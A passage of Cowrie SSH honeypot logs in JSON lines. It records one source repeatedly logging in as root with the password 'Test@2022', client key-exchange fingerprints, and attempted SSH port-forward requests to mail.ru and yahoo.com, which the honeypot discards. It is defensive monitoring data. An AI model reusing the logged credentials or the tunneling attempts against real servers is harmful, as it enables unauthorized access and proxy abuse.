mac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:47:03.136831Z","src_ip":"77.83.207.83","session":"66847a063daa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49740,"dst_ip":"1.2.3.4","dst_port":22,"session":"8bc7a742e592","protocol":"ssh","message":"New connection: 212.227.125.160:49740 (1.2.3.4:22) [session: 8bc7a742e592]","sensor":"my-vps","timestamp":"2025-08-31T03:47:03.164574Z"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:47:03.393058Z","src_ip":"77.83.207.83","session":"66847a063daa"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":5164,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:5164","sensor":"my-vps","timestamp":"2025-08-31T03:47:03.445182Z","session":"66847a063daa"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:03.496653Z","src_ip":"77.83.207.83","session":"66847a063daa"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":8148,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:8148","sensor":"my-vps","timestamp":"2025-08-31T03:47:03.641780Z","session":"66847a063daa"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:03.693098Z","src_ip":"77.83.207.83","session":"66847a063daa"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":28896,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:28896","sensor":"my-vps","timestamp":"2025-08-31T03:47:03.838185Z","session":"66847a063daa"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:03.889769Z","src_ip":"77.83.207.83","session":"66847a063daa"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:47:03.942402Z","src_ip":"77.83.207.83","session":"66847a063daa"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":59080,"dst_ip":"1.2.3.4","dst_port":22,"session":"6e0657e334be","protocol":"ssh","message":"New connection: 77.83.207.83:59080 (1.2.3.4:22) [session: 6e0657e334be]","sensor":"my-vps","timestamp":"2025-08-31T03:47:03.991582Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:47:03.992834Z","src_ip":"77.83.207.83","session":"6e0657e334be"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:47:04.043012Z","src_ip":"77.83.207.83","session":"6e0657e334be"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:47:04.293336Z","src_ip":"77.83.207.83","session":"6e0657e334be"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":28670,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:28670","sensor":"my-vps","timestamp":"2025-08-31T03:47:04.345211Z","session":"6e0657e334be"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:04.395541Z","src_ip":"77.83.207.83","session":"6e0657e334be"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"77.83.207.83","src_port":7097,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:7097","sensor":"my-vps","timestamp":"2025-08-31T03:47:04.536622Z","session":"6e0657e334be"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:04.587072Z","src_ip":"77.83.207.83","session":"6e0657e334be"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":23320,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:23320","sensor":"my-vps","timestamp":"2025-08-31T03:47:04.728663Z","session":"6e0657e334be"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:04.779019Z","src_ip":"77.83.207.83","session":"6e0657e334be"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:47:04.830119Z","src_ip":"77.83.207.83","session":"6e0657e334be"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":59173,"dst_ip":"1.2.3.4","dst_port":22,"session":"e35cb8655a07","protocol":"ssh","message":"New connection: 77.83.207.83:59173 (1.2.3.4:22) [session: e35cb8655a07]","sensor":"my-vps","timestamp":"2025-08-31T03:47:04.879308Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:47:04.880414Z","src_ip":"77.83.207.83","session":"e35cb8655a07"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:47:04.931353Z","src_ip":"77.83.207.83","session":"e35cb8655a07"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:47:05.183748Z","src_ip":"77.83.207.83","session":"e35cb8655a07"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":518,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:518","sensor":"my-vps","timestamp":"2025-08-31T03:47:05.235270Z","session":"e35cb8655a07"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:05.285917Z","src_ip":"77.83.207.83","session":"e35cb8655a07"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"77.83.207.83","src_port":32278,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:32278","sensor":"my-vps","timestamp":"2025-08-31T03:47:05.429040Z","session":"e35cb8655a07"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:05.479661Z","src_ip":"77.83.207.83","session":"e35cb8655a07"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":5737,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:5737","sensor":"my-vps","timestamp":"2025-08-31T03:47:05.624984Z","session":"e35cb8655a07"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:05.675638Z","src_ip":"77.83.207.83","session":"e35cb8655a07"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:47:05.727134Z","src_ip":"77.83.207.83","session":"e35cb8655a07"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":59241,"dst_ip":"1.2.3.4","dst_port":22,"session":"0b8f65f32db0","protocol":"ssh","message":"New connection: 77.83.207.83:59241 (1.2.3.4:22) [session: 0b8f65f32db0]","sensor":"my-vps","timestamp":"2025-08-31T03:47:05.775581Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:47:05.785809Z","src_ip":"77.83.207.83","session":"0b8f65f32db0"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:47:05.803973Z","src_ip":"212.227.125.160","session":"8bc7a742e592"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:47:05.804640Z","src_ip":"212.227.125.160","session":"8bc7a742e592"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:47:05.825438Z","src_ip":"77.83.207.83","session":"0b8f65f32db0"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:47:06.074104Z","src_ip":"77.83.207.83","session":"0b8f65f32db0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":16315,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:16315","sensor":"my-vps","timestamp":"2025-08-31T03:47:06.125001Z","session":"0b8f65f32db0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:06.174870Z","src_ip":"77.83.207.83","session":"0b8f65f32db0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"77.83.207.83","src_port":19941,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:19941","sensor":"my-vps","timestamp":"2025-08-31T03:47:06.316096Z","session":"0b8f65f32db0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:06.365803Z","src_ip":"77.83.207.83","session":"0b8f65f32db0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":22097,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:22097","sensor":"my-vps","timestamp":"2025-08-31T03:47:06.507967Z","session":"0b8f65f32db0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:06.557770Z","src_ip":"77.83.207.83","session":"0b8f65f32db0"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:47:06.608543Z","src_ip":"77.83.207.83","session":"0b8f65f32db0"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:47:06.640276Z","src_ip":"212.227.235.229","session":"7502611253dd"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":59321,"dst_ip":"1.2.3.4","dst_port":22,"session":"50dc266b3b53","protocol":"ssh","message":"New connection: 77.83.207.83:59321 (1.2.3.4:22) [session: 50dc266b3b53]","sensor":"my-vps","timestamp":"2025-08-31T03:47:06.657338Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:47:06.658098Z","src_ip":"77.83.207.83","session":"50dc266b3b53"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:47:06.707909Z","src_ip":"77.83.207.83","session":"50dc266b3b53"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:47:06.956877Z","src_ip":"77.83.207.83","session":"50dc266b3b53"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":29495,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:29495","sensor":"my-vps","timestamp":"2025-08-31T03:47:07.007620Z","session":"50dc266b3b53"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:07.058937Z","src_ip":"77.83.207.83","session":"50dc266b3b53"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":21917,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:21917","sensor":"my-vps","timestamp":"2025-08-31T03:47:07.200352Z","session":"50dc266b3b53"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:07.250267Z","src_ip":"77.83.207.83","session":"50dc266b3b53"}
